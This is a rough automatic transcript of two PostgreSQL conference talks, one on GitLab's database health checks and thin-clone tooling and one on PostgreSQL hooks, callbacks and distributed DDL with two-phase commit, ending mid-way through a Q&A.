talk about briefly talk about POSGAS Checkup open source tool for automated health checks of POSGAS databases. The idea was, like, in some cases, we don't have monitoring for POSGAS, especially queries at all. In some cases, we have query monitoring, but it lacks old data and we cannot understand what happened one year ago. Or also it has, like, only a few metrics that are available for analysis and you don't have detailed view on most important query groups. And additionally, there are many things that DBA usually does. And as I mentioned, I relaunched my consulting practice in California a few years ago. Before that, I was CTO and CEO of Ferris Startups in Russia. And when I relaunched my consulting practice, I previously had consulting practice in Russia also. So I relaunched it and found myself in position when a lot of stuff is still very manual. And you need, for health check, you need to do a lot of... You need to have some kit. There are many interesting queries in GitHub, GitLab, and you can find some collections of useful kits. But the problem is that it's very boring. And usually, when you meet some database, first time you are interested, you perform very good health check, then you meet it second time. Six months later, you perform it also very well. But then you already very bored and you skip many checks and this is not what we need. So what we want. We want to collect data continuously. So that's why my team and I created this PostgreSQL checkup tool. And the intention was I want to automate the most boring things and run many checks in automated fashion, collect data, and analyze it, analyze the primary and all replicas in centralized fashion, and have good conclusions and provide good recommendations for teams. So we already created almost 30 reports. Most of them have not only observations, but also conclusions and recommendations. Very lightweight checks. And one of key ideas was we should not install anything on production. We should do the same things as regular DBA does. So it can be used in the first day already, like day zero, zero install approach. And also it's very lightweight, not obtrusive, it limits itself using statement timeout. So it's very like light tool. And it performs multi-note analysis, as I mentioned, all nodes are information from all nodes are aggregated in single collection of reports. So we do various stuff, blood control, index health control, deep query analysis with various metrics. And also we track versions, settings, find divisions between the primary and replicas. We can answer questions, what kind of settings we had two months ago, for example, it's kind of like it's like kind of strategic tool. It's not intended to react quickly on problems. But it's more like for capacity planning to understand your workload better, how health of database looks like over time and so on. It's like it's for control of database health over time strategically. And a few examples of reports. Here is example of, for GitLab example of a news indexes report. It's not that bad. We have 160 gigs, you can see it here of disk space, I would say wasted because nobody is using these indexes. Of course, GitLab is specific because GitLab.com is only one of more than 100,000 installations of GitLab software. So sometimes we have like question, maybe some indexes needed for different installations of GitLab. So it's kind of tricky little bit. But for nine terabyte database, it's kind of small fraction of disk space wasted. And of course, all indexes, unused indexes affect modifying query performance. So you always want to get rid of them sooner. And information here, we specifically provide 0000s to convince everyone that index is not used not only on primary, but on replicas as well. So I saw mistakes when people analyze only primary and drop index, but it was used on some replica. And of course, here, it's sorry for the small font, six months of analysis. So like statistics age is six months. So definitely we can make conclusions here. If you see age, like only one day, you will see warning here, like it's not enough to draw conclusions already. And here is the report based on two snapshots of PGSTA statements. It can be extended with PGSTA cache to see CPU and disk IO, real disk IO. But basically the idea is we collect, we get all the metrics from PGSTA statements and we do additional stuff like divide by number of seconds distance between two points in time. And we start finding some interesting insights. For example, you can see the most the heaviest query in terms of total time, this one. We see that it, it, it, it, the primary which has, as Jose mentioned, 96 cores, so we lot it we need, we could survive and service query process with query only using one just one core because you see it's less than one second per second. We server spends less than one second of CPU time, it's not pure CPU time, of course, locking and IO is included. So less than one second overall every second. So on one core would be enough. So it means quite well optimized and the influence of this query group is less than, it's only 15%, it's quite well optimized. In bad cases, we see like 40, 60, sometimes 70% and some queries like it's so huge, we start ringing bell, we need to optimize it very like sooner. So you can feel workload much better if you combine it with your monitoring, you start, start on the standard workload much, much better. And we also provide like high level report, we use like the same thing, but we aggregate not based on normalized queries, but only the first word from them. For cases like GitLab, it's based, it's working on Ruben Rails or AM. So not many, almost no SQL functions or PLPG SQL functions are used. So we can aggregate by first word and understand like select are almost 94% by frequency, but much less by total time. And of course updates only 2% by frequency, of course updates are take more time than selects usually. You can see average also here. So you start feeling your workload much better. And the highest level, we provide a single set of metrics for like aggregating all queries for PGSR statements. PGSR statements dot max parameter is set to 5000. So it's kind of representative, especially if distance between two points is not huge. We have like 30 minutes, I guess, during the busiest hours. So this is how you can start feeling your workload based on this table data. Not all people love tables, but not all people love graphs as well. So it's good to have both. That's it. Like as I've said, PostgreSQL is a boring tool. It was created to make DBA or DBA or ES work on health checking database less boring. So let's switch to like more exciting topic actually, how to conduct experiments on databases and how to make experiments much, much better already today. And so my intention originally with PostgreSQL AI company was we want to automate, which is not automated around databases specifically, what is related to performance optimization and scalability, not touching sharding and provisioning and so on topics which already solved by other companies. And here you can see, you can see logos of our some of our customers and partners. Of course, GitLab is very significant in this list. And the idea was like, I started to notice when we need to develop something or test something, we deal with usually we deal with small or like empty or small synthetic databases or some reduced set of data, reduced data sets and development, that part of the Wops, it becomes weaker. Only a few people usually can create a clone of real production database and verify ideas there. But it's not good if you cannot verify ideas. So the tension was we should fix it, fix this picture and balance depth and ops and give powerful tools for those who develop and test something before it goes to production, deploy it and under operation. So that's why we created database lab. Before we talk about it, let's consider what was before before, if we want to check something, for example, some plan of some query, we usually do it right on production to get good results. Because if you deal with different data, it means that you deal with different statistics, PostgreSQL internally has different statistics of data. So plan plans can be very different. So your explain will be meaningless. You want some good results, so you need to go to production. And GitLab also had some tool to automate, explain, right on one of production replicas. But what it means? It meant that you cannot run queries longer than 15 seconds. This is GitLab statement timeout. Of course, some people can change it if they can issue set command. But it's not encouraged if you have query running 30 minutes. Maybe it's not a good idea to run it on a replica because the hosting by feedback is on. So auto vacuum on the primary will be, will know that you still need this data. So it will wait and not delete the tuple. So health can degrade if you run it often along queries. And of course, you cannot run updates and sorts and so on in this case, in the case of replica. Of course, you cannot verify index ideas or change schema. We are very limited. That's why you probably need full size, thick, irregular clone. So you need to create a replica and promote it. Or maybe you want to provision a clone for using physical backups. GitLab.com uses world G in GCS. GitLab data stored in GCS. So you can provision a new instance for your needs, like lab instance, using that data and production notes will be not affected anyhow. No risks here. Good. But you need to wait. You need, first of all, if you have several people who need it, you need several instances or you will need, you will have conflicts. I specifically put two people here working with one single database. It highlights how problems can rise. So you want to spend less, less time, money and less time because we've almost 10 terabytes GitLab.com has right now. It means that usually like one terabyte takes roughly one hour. It's like good speed if you have one hour to provision one terabyte to copy over network from backups. You can speed it up and new world G is very good. Previously, GitLab.com had world E. It was replaced by world G. And right now it's like between 30 and 60 minutes for one terabyte. But it means that for database of this size, as I mentioned, nine terabytes, it means that you need, it will be, it will be 10 very soon. So it means that you need like to spend five hours or so to provision a full size copy. And it's not fun to wait so many hours. And when you check something, it's, if you cannot revert your changes, or if you revert the changes but physically out changed, it's no good. Like in terms of experimenting, it's really hard to repeat multiple times the same thing. But during development and testing, we do need to repeat everything. So that's why it's like usually in most companies, what we absorb, people just tend to skip very important checks. They don't check queries, check it, like they try to guess what will be on production. And this leads to mistakes and missing problems, missed problems. So how can we do better? We can take only one machine with one disk or disk array, and we can copy data in regular fashion, thick, thick copy, one time. And we can maintain its state being like a replica, running small replica, small means like shared buffers are small, but we are running it, replaying walls from the archive. So constantly updated, the state is updated. But when someone needs to experiment, we provide think-loan. Think-loan means that you, what is think? Like think-loan on high level means that you have one machine with one disk of 10 terabyte, you put 10 terabyte database there, it's compressed by the way. Here we talk about, like think-loan can be achieved by various tools, but here we will talk about ZFS and GitLab engine, data-based life engine supports both ZFS and LVM, but ZFS is much more powerful for our needs, so we will talk about ZFS. So ZFS can provide you, in a few seconds, we will have a fully independent copy of 10 terabyte database, and you can change it and other people will not see the changes. They can work on the same machine with this different copy of the same database. How it work? How does it work? I'm sure most of you already know think-loaning, think-provisioning terms and copy-on-write idea. It's used in many areas of computer science, memory, file systems in many places. But if you don't know, I strongly encourage you to go and read some articles about it. There are many articles including Wikipedia. But roughly, here we talk about file block level, not file level, but data block level. So we share data blocks among all people, and common data is shared, but when someone changes something or adds some new data, like we create and fill some table or create index or which issue some update, additional like delta is stored additionally. And ZFS tracks everything transparently. So what we have, we have one 10 terabyte disk and like 20 people working with 20 close at the same time. It's working very well. So this is like magic. It feels like magic. You can get your database or couple of databases in a few seconds, do something and get rid of them. It's like, it feels like disposable databases actually. So here there are constant process, not constant process, there are good areas where you can apply this and bad areas. Good areas is, as I've mentioned, SQL optimization. So you can run explain, you can run explain analyze. You need to keep in mind that timing will be different because it's different fast system, different, usually weaker machine than production. We don't want to spend a lot of CPU for like 20 people, 100 courses too much. Memory also small number of bytes, terabyte gigabytes is smaller, and the cache state is different. So timing can be different. But I should mention that if you run something or production today, it can be different tomorrow because of different parallel concurrent workload. So it also so. That's why I always encourage to pay attention to structure of explain plan and buffer numbers. So if you run explain analyze buffers, you get buffer numbers, you see how much data is processed. And since we tuned in clones, we put a plan your settings work ma'am, and effective cache size, most importantly, the same as on production. We don't have so much gigabytes of memory, but we put effective cache size above our limit. It's okay. And but a post this planner, this is what is needed for post this planner to provide plans identical to production. And shared buffers are much smaller, but it's not the interesting fact that planner is not using shared buffers. That's why we can run multiple purposes on the same machine. We can check the DL, we can check the index ideas, we can automatically check database migration since this is very hard topic right now. And much more, we can upload some analytical queries to such machine and not disturb auto vacuum on the primary and not having delays, not disturbing others. Also, like what we should not do with this approach with think clones, we should not do load testing because it's different file system behavior will be different. And also, if your your intention is to run some heavy load and involve multiple cores, CPU cores, it means that you should be alone on the machine. So it should not be shared. That was like engine supposed to be shared. Also, I see, I see, I see some people think about database life engine lies like regular clone. Of course, it's not not not fully good idea because it cannot fall over to such machine. So but some pieces, for example, recover accidentally deleted data. It makes sense. You can much faster recover data using database life engine, rather than performing point in time recovery using a Volg or a G backrest or something. It's like that interesting applications around it. But of course, no load testing. We have open core model. So database life engine, it's very similar to GitLab. That was like engine is open source, you can take it and you can participate in development, we have external committers. And there is graphic and provides it provides API and CLI out of the box already. If you want graphical interface, please try our SAS solution, post the CI, you will see also additional features there such as access control, fine grid access control, visualization, history, centralized storage, storage of knowledge related to your database performance. And this is how originally it looked like in GitLab. Like GitLab was the early user of our tools. And it started from jobbot. It's it was originally originally working only in Slack. And it right now it provides interface slack both slack and web UI on posgis.ai to more than 160 developers who have questions like what will be the plan for this query on production. Most of them don't have access to production data, but they have such questions. Previously, they needed to ask database experts. And as Jose mentioned, GitLab is distributed. So it meant that you sometimes you need to wait several days to get answer. It's not good. Asynchronous remote work is very related to you want to be unblocked and not block others. So it's better to have direct tool to access to answer directly. And my intention was I don't want to answer simple questions all the time. I want to deal with hard problems. So I uploaded this work to chatbot. And chatbot can answer question, provide a plan as it will be on production. And also you can ask him what what if I will have this index? Okay, we will create index and repeat this explain. So that's how it works. Using think loan, you will see the plan. Not directly accessing database. And this was one application of database lab and jobbot. And it's very successful already. But another one is also interesting. And there is a lot of work in progress right now. In both companies in GitLab and in our POSGSI company. So the problem was like, okay, we have powerful tool, we can manually check various queries, DDL. But sometimes like since it's manual, sometimes we like it's hard to check everything all the time. And you change something, you need to repeat your check. It's like there is some manual part in this work still. And sometimes this like example here, this happens. So some deployment and some queries hit statement amount. It's very aggressive in GitLab.com 15 seconds. If you start hitting it, it's no fun. So the idea is you can put work with CI with database lab, think loans in CI, GitLab CI in this case, and use CLI to get think loans. And then it should be like how it works in GitLab, it's implemented as a separate project. And only a few people have access to it because it's production data. It's kind of production project actually. So it's under like in terms of security and operations, it's kind of part of production. But it serves the needs to check what will be with deployment, right? So and the original author of database migration sees only the summary. Summary is very primitive right now, only timing, but it's planned to provide much more details and metrics and analysis of how migrations DDL will behave. And also in PostgreSQL, we created concept of CI observer. It collects various stuff, including it can highlight if you have dangerous long lasting lock. For example, you do create index on the large table, but for God, the work can currently, it's a trivial example. It will be, it will block even selects for a long time. And CI observer with data running on database lab, it helps you to get these cases and mark this CI built as failed, not to deploy this. So you go and add work concurrently on only then you can deploy it. Okay, quick demo. I very briefly, since we are running out of time, very briefly show you how easy is to create a clone. This is a GitLab project on PostgreSQL. So you can create clone of real production database in seconds. You can choose, you can take, you can time travel every, every six hours, new snapshot is created. Let's create version of database for tomorrow. So we database size is nine terabytes. And let's see how it is to create it. Here I use graphical interface API and CLI also available. Here it is. So we have new clone and it took only four seconds. Okay, we see that other people are also working there is a job bot which like it's upper level without direct access to data, you can talk to it and for example, do something I already started session here. And we implemented various additional capabilities here, for example, hypothetical indexes and you can see activity of what is running right now. You can run DDL with exact command, explain analyze buffers with explain command. So we for example, can explain from projects and see like this number is expected it's running. So it runs two times first time without execution and already running second time with execution. So it should take like data should be cashed right now. So it should take right something like 10 seconds or so. Let's see, maybe more. Let's let's see another feature while it's running. So all the directions we've just had bought is stored in history. So you can see your teammates also working here. And, and you can return to previous optimization sessions. I have some example here, which, which allow us to see some interesting. Okay, I have some example here, which allow us to see additional features where we embedded path to visualization from Dalibor, you can see explain plans, plans visualized or explain depth ish very popular tool. And you can even you can share it if you want to this information to be public publicly available, you can share it, including visualization, but by default, it's not available to others. I mean, it's available only for your teammates. And that's it. Okay, let's check. Okay, actual plan already done. So we see this number of projects and GitLab. So we also can go ahead and drop. So we can go ahead and drop. So we can go ahead and drop projects and GitLab. So we also can go ahead and drop, drop this table right now cascade because many tables depend on it. So right now we are dropping. We are dropping the table, the central table in GitLab and its production database, but not real database, it's a copy, not like we, we asked for yesterday copy, right? We dropped this table, it should take several seconds. And then we can, if we, if we repeat this, explain, we will see that this table does not exist anymore, right? Error here, but we can reset and it again, it takes a few seconds to reset to the initial state and start working with exactly the same snapshot, exactly same statistics, physical layout, blow out everything like on production, corresponding to that point in time. Okay. And we, we have this table again back. So this is how you can iterate in development using manual chatbot tool or you can automate it using CLI in your CI, for example. That's actually it with demo, some summary, health check is automated in GitLab using PostgreSQL checkup tool and more than 150 engineers now have access to tool which without anyone else allow them to get answers to questions like what will be the plan on production for this query? And I, like, also they can verify any DDL including like create index or change scheme of the table and check queries again. This is, this is called optimization process. So they can do it unblocked, not asking her, when they ask her, they already collected some initial data and everything speeds up significantly. They also, I've noticed that people who didn't have access to production, actually most of developers, most of backend developers, they now have access to experimenting with real, real data, not seeing this data by the way. And so, so they can understand how PostgreSQL behaves for various queries. So they actually make, make, can make mistakes and learn because when we learn, we need to make, be able to make mistakes. And this is very good. They don't block others doing so. And database team has much, much more details about behavior of particular database migration or particular query. And they, their work is simplified and improved as well. So control over performances of databases is improved. And the downtime and performance regression risks are decreased because a lot of automation involved. That's actually it. That's actually it with my part. Jose? So we are done? Yes, we're done. Okay. Good. Thank you for watching. It's time for questions and answers. Good. Good. Like just like a minute or so. Okay. So we are like, we're redirected to the mainstream. Okay. Okay, we are live now. So thank you guys for the great talk. That was really interesting. And I see some questions, but most of them were already answered by you. Maybe the question about PgStat statesman versus PgBudger from myself, like if you could answer this one. Actually, we like to analyze the PgStat statement. Since we don't log, we log just the queries that are over one second of the threshold and are in the logs. So you will see having a spike of performance, you will see just the statements that are the slowest ones. And you lose, we wouldn't see what are the queries that are being processed in this threshold behind. And having analysis in PgStat statements, principally as we do that, sending this information through from a TUS Thanos, we can analyze even this small queries like most of them, I don't know what these statements are. This, like I will try to add only a few words because it's a very, very broad topic. Generally, we have three sources of information for what I call macro analysis when we try to analyze the whole SQL workload. First is logs. And historically, this appeared much before PgStat statements created. We had PgFuin, then PgBudger, first in PHP, then Perl. And then PgStat statements, aggregated statistics. And there are alternatives to PgStat statements. I can recommend the other talk from HOSDEM, from Perkona, about PgStat monitor. This is very interesting, new development. And finally, we have PgStat activity and we can sample from it. And sometimes we need to do it. For example, to answer questions, do we have elevated timing for some query because of locking issues? You can do it with analyzing logs partially, but you can have much better picture if you analyze weight events in PgStat activity. So there are three sources. And if you can combine all of them and use different tools, you have the most power. Because for particular cases, one tool is not enough. Okay. Understood. Yeah. Still, slow lock is an essential tool. Sometimes we, for example, PgStat statements doesn't register unfinished queries. And we can see them in the lock, we're canceled by statement timeout. Yeah. So there is another question from Magnus. So have you done any work or thoughts around integrating this snapshot tool with some form of data anonymization? Clearly, you can run a full anonymization process. Can't he clone itself or call goes away completely, but maybe, but maybe ask an intermediate step? Yeah, this is a very good question. And we have such questions constantly. And we have some work already done. Right. So if you first question here, we need to understand for in particular case, is it, is it okay at all to store any personal data where database lab engine is located? Because if you want to analyze, but you put the server to non production, but you still, if you're an animi as like only when preparing snapshots, it's possible by, by database lab engine. And actually we have integration, like some integration with posgas and animizer from Dalibo. So it's possible to use posgas and emizer together with database lab engine. In this case, you continue, for example, physically consume walls and replay changes from the source from archive or from directly from one production node. And when you, when database lab engine automatically prepares snapshots, say every hour or every four hours, you can inject any transformation. For example, posgas and animizer transformation. But in this case, physically some personal data still is stored. And maybe it's breaking some rules in the company. And you need to check it. So in some cases, if you want, if you want, if you cannot do it, you need first sanitize data to get rid of personal data, and then bring data to database lab engine. In this case, of course, you need to choose a logical way like dump restore with personalization. So that database lab engine supports both approaches. And like in the best case, you want two database lab engines. One should be closer to production without any anonymization and streaming, not streaming consuming walls, replaying wall walls from the archive. And the snapshots will be raw and only limited people, limited number of people will have access to it. And another database lab engine is with without personal data located to your non production environment. And this, but having the same number of rows, just without personal data. So it's very interesting and very, very difficult hard topic. And I think we will continue looking at this direction anyway. Okay, cool. And let me ask again the question that that was in the chat, because the chat will not be available later on. So the question about marginalia, could you explain what marginalia is actually, because probably most people would not be aware of that. And the exact question was some more. Yeah, does anyone know if there is a library similar to marginalia for node JS apps or go long apps? Yeah, also, you don't want to answer this or what I can answer as well. Okay, I'll answer. So marginalia is Ruby Jam extension to that allows you to answer questions. Okay, I see some query. It's not good in terms of performance. How can I find the lines of code where it originated from? There are different approaches to answer such questions. For example, you can try to use some tracing and some systems like application performance monitoring, which allow you to see call stacks associated with some query. But in this case, we have some caches we can find in which Ruby classes this query was originated. And there is, as I explained already in chat, there is a problem, like it's very useful, it's very good. But you need to think about a couple of problems here. Pergest start activity, query and pergest activity by default is limited to 1024 characters. You can increase it, but restart will be needed. So it's better to increase it earlier to a few thousand characters. Because sometimes we write developers write very long queries and this comment is used in the end. So if you're targeted, you don't see the comment. And this is about pergested activity, which provides a view on current queries as for pergested statements, which aggregates normalizes queries. So groups them into some query groups. It's interesting behavior. Like it has interesting behavior with respect to comments. It will take the first occurrence of the comment and we'll keep it for a group showing it like this is a comment raw without any not removing anything from the comment. But every subsequent comment for the same query group will be just ignored. So metrics will be incremented. And you will see just the first occurrence of comment. And you can trace only the first occurrence of query in this group. And this is not convenient. So you need to reset to see another one. And again, you reset, you see the first one after you set normal, not more. So that's why we probably need to look at pergested activity. Or again, of course, if the query is registered in the log logs, if it's slow enough to be above log mean duration statement, you will see the full text of the query, including this comment, and you can trace the origin of this query. As for non Ruby, I don't know. Sorry, like not JS, I don't know. Okay, sure. We've got one more question from Simon. How do you handle schema changes in depth when the developer wants to find the query plan against the prod like data for a query that uses the updated schema? Is that possible with the thin clone? Yes, of course, thin clone is read write provides read write access, you can change schema. If I mentioned example, you can create index, of course, you can add a column, you can do some complex change, and then check performance against the new schema. This is the magic with thin clones. It takes a few seconds. You have your own 10 terabyte database, you can change it anyhow. Nobody noticed, like, because every developer has a separate thin clone database. So, and like, the the idea is how to how to connect this to Git, for example, to associate with branches, we have actually something already developed, we can associate a particular clone with particular branch. And like now we think how to maintain long lived clones also, because sometimes you develop branches for months. And you want to maybe to keep this clone for longer, usually we keep it for not more than a few days, because if you have constantly updated state, and keep some old clone, it occupies data, because like, you have mainstream like this mainstream of data. And if you keep old clone, you keep like, you keep many data blocks, which only you need. And so it started to occupy too much space, because mainstream already run away to the future, but you still in the past. So, we are thinking how to improve this situation. It's like very interesting topic. So like, also in terms of cli, people want to work with database, like fork them like, get, get, like, like coding Git. So, I think we will develop improve something in this area as well. Everyone is welcome to go to our Git, repository on GitLab and open an issue and start discussion. I would very appreciate this. And it will be interesting to, to find some ideas and improve. Okay, thank you guys. Those were like all the questions and we are like, in time actually. So, that was the closing talk on our Postgres Devrooms. So hope like all of you will join us also tomorrow. So tomorrow we're starting at 10 am with great talk.
GitLab has an aggressive SLA, that made us research and develop solutions to improve our performance in all directions, on one of the most important components in our architecture, the PostgreSQL relational database. During this talk, we would like to invite you to explore the details about how we improve the performance of the main PostgreSQL relational database of GitLab.com in a high demanding environment with a load between 40k to 60k transactions per sec. We would share with you our projects, processes, and tools, and all tools being developed by our partner Postgres, including the main one, Database Lab.
10.5446/53271 (DOI)
Hi, my name is Alexei and I am software engineer at PostgreSQL Professional Company. And today I want to talk about specific aspects of PostgreSQL Extensibility. PostgreSQL is actually well known for its extensibility. One can create their own types, operators, access methods, or use powerful PLPG SQL language to write extensions, functions, triggers, and so on and so on. Everything is documented, supported, and ready to use. There is a lot of information in the official documentation and if we refer to it, we can even find roots of such remarkable extensibility. It says that PostgreSQL is extensible because its operation is catalogue driven. And also PostgreSQL keeps a lot of information in the catalogs and these catalogs are user-visible and it keeps not only information about databases, tables, colon names, it also raises information about operators, types, and many other things. So any user can extend PostgreSQL in many different ways. Yet, there is also a very low level extensibility layer which allows external developers to pick right into the PostgreSQL core hooks and actually callbacks that are very similar, but we will talk about them later. For some reason, this topic is not covered enough by official documentation. I think this is because it is really a low level extensibility layer and you can't use them properly without taking a look on the PostgreSQL code base. So what is a hook? Hook is just a function or actually a global pointer to a function and if it is defined, this core will execute it during standard key reprocessing or back-end lifetime at some specific moment with a predefined set of arguments. Such hooks are scattered all over the PostgreSQL core and extensions or shard libraries can set these hooks to get a view on PostgreSQL internal state or change its behavior. Let's have a look on how hooks are implemented in the code. Their implementation is very simple and straightforward. As I said before, it is just a pointer to a function and PostgreSQL checks whether it is defined or not and if it is defined, this function will be executed with some predefined set of arguments before or instead of some standard processing routine. Here is an example of hook from PostgreSQL which is called executor start. Since any hook is just a global pointer, it could be already defined and set by someone else. As that way, if extension or any external sharded library wants to install some hook, it first has to keep previous value of this pointer. After that, we can put our own pointer to our own function to this hook. This is the example of how register statements installs its hook. This model provides possibility to track planning and execution statistics of all SQL statements executed by server. That way, it has to set as many hooks as possible along the whole way of query processing. By obeying the rules that every extension should remember previous value of the hook, we build a chain of a linked list of all hooks and when hook is executed, it will also execute its predecessor and this next hook will execute its own predecessor and finally, the last hook will execute the standard processing routine. That's why every hook has to always execute its predecessor. This may be a problem because if any malicious extension will forget to call its predecessor and disables this rule, we will break standard query processing because no one will call the standard processing routine and if you lower such extension, it will break your server query processing. Every query passes through the different stages and postgres subsystems. For example, parser, analyzer, planner, and executer and finally results are returned back to the client. Hooks are placed all over the postgres query in many parts, but they are not distributed uniformly. I put some examples on the query processing flowchart and sometimes it is easy to point the hook location for executer because they are placed very straightforward in the start of the user and in many places between. All for planner where the main hook is planner hook and it's surrounded by a lot of additional hooks to add planner path and so on. But for some hooks, it is not easy to point the execution because this post-parse-analyzed hook is placed somewhere between parser and planner and we have already parsed 3 of the query but it is not planned yet. But I think it should be actually closer to the planner. As I said, hooks are not distributed uniformly and densest parts are executer, planner, and security hooks in the top of this flowchart where all the client authentication process happens. For example, this client authentication hook. All documentation prefers to keep silence about exposed hooks but there are some external sources that are well supported at least right now. First it is GitHub repository which lists all available hooks with their arguments and also every hook has a text description which says some basic information about where it is placed and how it could be used and maybe some extensions, lists all the extensions which use this hook. Next is this pgpedia website which is unofficial on documentation of the Postgres and also it has a list of hooks and the most interesting part there is that it says in which version which hook were added. And also it refers to a Git commit which introduced this hook. Also, postgresql.org website refers to these slides and talk from PgCon 2012. It is well detailed and there are a lot of information there but of course it is slightly outdated because some hooks were introduced after this talk. Let's move on to the next entity that is pretty similar to the hooks callbacks. Callbacks are mostly used for internal purposes but may be also useful for extensibility from the extensibility perspective. And some bundled with postgres extensions like postgresfdw get users there. The main difference in my understanding is that callbacks are initially designed to be set by multiple users. In other words, you don't have to care either the same callback has been already set by someone else or not like you have to keep a previous value of the hook. You just use the special set of functions to register your own function as a callback and that's all. This set of functions usually have very straightforward names like register something callback but sometimes they are not and called like before shared memory exit, on shared memory exit and a bunch of others. If the callback is defined it will be executed at some proper moment with proper arguments. Another important difference I think that callbacks provide less possibilities to modify postgres internal state and they are designed more to do a clean up for example clean error state or do something to catch invalidations and similar work. This is an example of how postgresfdw registers its callbacks to track cache invalidations and transaction state change. As I said you just have to call this set of function and it will be put into postgres grid core. Internally callback set of functions does a very similar work to what hook users do their self. It organizes a list of all registered callbacks and when it is time to go, postgres will run all of them one by one. Now we have a sense of how hooks and callbacks are implemented and work. Let's move on to an example of what an external developer can achieve with them. Nowadays everyone is talking about distributed postgres and we at postgres professional have two projects dedicated to distributing postgres over the multiple nodes. It's a multi master and shardman. This is a completely different story so let's talk about second sharded or partitioned postgres and in that case one wants to scale database horizontally. In other words we want to create partitioned tables but every node, physical node of postgres have to keep only a limited number of partitions. For example, if we're on this chart we have three nodes and table A and we split it into three partitions and first node keeps only partition one, second node keeps only partition two and third node keeps the last partition of this table. So we just distributed the data across or uniformly across this node. This is a very broad topic but let's focus on the essential part, scheme definition and creation of such partitioned tables. Of course we cannot use plain create table anymore because we have to scatter partitions across multiple nodes and also we have to link remote partitions to their physical representation because at least with postgres fw any data were accessible from any node. So client can connect to node three and also get data from partition two. So the basic way here is to just make partition two as a foreign table for partition two on the node two. So actually we need this distributed data definition language or DDL and so what requirements we can put on such distributed DDL. First we have to be able to broadcast specific or all DDL statements across a number of postgres skill nodes, second we want to create such distributed tables with familiar interface that's why we have to extend create table syntax and third is that this operation should be atomic and if you create do some DDL on multiple number of nodes this command should be either committed or aborted on all postgres skill instances at once. So we have to use so called two phase commit protocol and final requirement the most important for us is that we want to do everything from the extension and we do not want to do any core modifications here. But how does standard DDL processing work in postgres? There are a lot of steps as always but I put on this flowchart only three that matter for us. First we receive query from the client, we parse, plan, plan and do some preparation on it and finally we pass it to the processing routine which is specifically DDL. It is dedicated for processing DDL, it is called standard process utility and how we can intervene into this standard DDL processing and integrate our broadcasting routine. Actually there is a hook right in the place where we do need it, it is called process utility hook and it is executed instead of standard process utility responsible for DDL processing. And this hook receives the raw text of the statement and the plan statement. So we can decide for example if we receive create role and we decide that we want to have the same roles on every postgres instance then we can broadcast this original role statement to all postgres nodes. Code an example of this part can be found on github in our repository. Now as we have an option to broadcast an arbitrary DDL to all nodes we want to give users a convenient interface to create these distributed tables. Of course we can write some PLPJs query function, some wrapper which will do all the work and everyone can execute it on the existing table as for example CITS does and we can create a wrapper which will execute create table internally. There are some options but everyone gets used to create tables with create table statement. So we want to extend the syntax of create statements to be able to add additional parameters. In our case it would be distributed by the only one required parameter. It says that this table should be distributed across a number of nodes and it also specifies a column name which should be used for partitioning and it will be used as a partitioning key. Also we can specify a number of partitions, it may be optional if you have some default value or collocation information which means that if we have two tables with the same partitioning key and the same number of partitions we want that partitions with the same boundaries will be placed on the same physical node. So all joints executed on such partitions was local to some physical node. First let's check how posgrace reacts on unknown parameters in the create table statement. If we put this query in the psql we will see this unrecognized parameter distributed by a row and luckily it is not a syntax row which is usually thrown by the parser and it gives us a clue that parameters are not processed by the parser itself. It is not necessary because sometimes parser has some custom errors and process parameters. But still if we check the parser code we will find that it processes this unknown parameter successfully but this error arises somewhere later. So now we know that posgrace is able to parse arbitrary parameters in create table statement. However further routines do check them and do not path unrecognized parameters to the executor. And we need somehow read this additional parameters before parser verifies them and actually we are lucky enough again because we have post-parse analyzed hook which is placed after parser as I said before and we already have this parsed statement of the original query and we can check that it has this additional parameters and we can read them and keep in the local backend memory and after that remove them from this parsed statement and return control back to the core. And posgrace will not notice anything suspicious here and successfully proceed to the process utility hook where we can use our previously kept parameters to do some additional work. For example if we have distributed by we can add partitioning information there and so the further routines will create a partition table instead of a simple table. Or we will also can create partitions as well with the main partitioning table and we can decide to do broadcast or broadcast part of the work or anything else. So that's why we tricked posgrace extended syntax but posgrace thinks that we have not breaking anything. And final part of our extension to traditional DDL is atomicity. Without to PC transaction might end up committed on some nodes and aborted on others. It is not a consistent state and also it is not recoverable because you cannot abort already committed transaction. And we have to use so called to face commit protocol which introduces an intermediate state just called prepared and prepared transactions can be both committed later or aborted. And posgrace already has to PC infrastructure so we have to only use it when we are doing broadcast. I have really tried to make this flowchart readable but I'm not sure I have succeeded. Anyway, the main idea was that on the left part we have transaction flowchart. We begin it, we do some DDL there and since we have our standard process utility hook we can decide that we have to execute the same DDL on another node. This is placed on the right part of this flowchart. We begin this foreign transaction and execute this DDL there. So we have two transactions. Finally we decide that coordinator, this local transaction wants to commit and we proceed to commit. And we have transaction callback which is placed in the middle. And we have this pre-commit event and posgrace fdw for example uses this event to find a time so to decide that it is time to commit all foreign transaction which was open during this local transaction. And we first commit all foreign transaction and proceed to local commit. And everything is fine if we succeeded but if we fail at some point we may end in the state where foreign transaction was committed but local was supported and as I said it's not a recoverable state. So how we can integrate to face commit protocol here? If we consider only commit part of the previous flowchart then instead of doing commit of foreign transaction at pre-commit event in the transaction callback we can first prepare it and when we prepare successfully all foreign transactions we will proceed to the local commit and also in transaction callback we have a commit event. In this state when event commit event fired for transaction callback it is too late to abort local transaction so we will proceed to committing all prepared transaction on foreign service. And again if everything went fine then we just commit all foreign transactions and proceed it to committing all local transaction. But if we crashed at some point we may end or foreign server has crashed we may end in the state when some transactions were prepared but not committed yet. And in this case we have to introduce some additional process which may be called resolver and it could be a background walker or even external process written in any language which will crawl every server and if it finds this orphan prepared transaction it should find the state on the coordinator who initiated this transaction and decide whether to commit them or abort. Simple patch prototype which adds to face commit protocol into posgust fdw can be found in the fpgsql hacksmailing list. So finally we achieved all our points and we didn't touch posgust codebase and we can use our extension with the same packages, packets of posgusts and we do not need to recompile it and do anything else. If you have any questions, feedback or comments you can reach me directly and thank you for attending my talk. Thanks. So I think we are live now. So we have one question up for the year is about the Duke at parse level. What if we want to manage the statement at parse level? We are seeing the statement can be trapped after the parsing is done. So what we want to do before the parse is done? Do we have a look for that? No, unfortunately as far as I know we have only this post-parse analyzed hook which is only related to the parser and it receives already parsed tree where everything is already parsed so we can only modify this already parsed tree. So I think that actually we can do a lot of stuff there but still we are limited by the parser so if there are some invalid characteristics then the parser will throw this syntax error much earlier. And so I think that the process hooks only placed in some specific places due to historical reasons because some places were more interesting from the extensibility perspective like executor and planner. So far we have no option for that. There's another question. Any comments on cleanup of a new prepared transaction to avoid blocking vacuum? I was about to ask these things. How about the prepared transaction if they stay unused? Yeah, this is the right question. So if we do such implicit 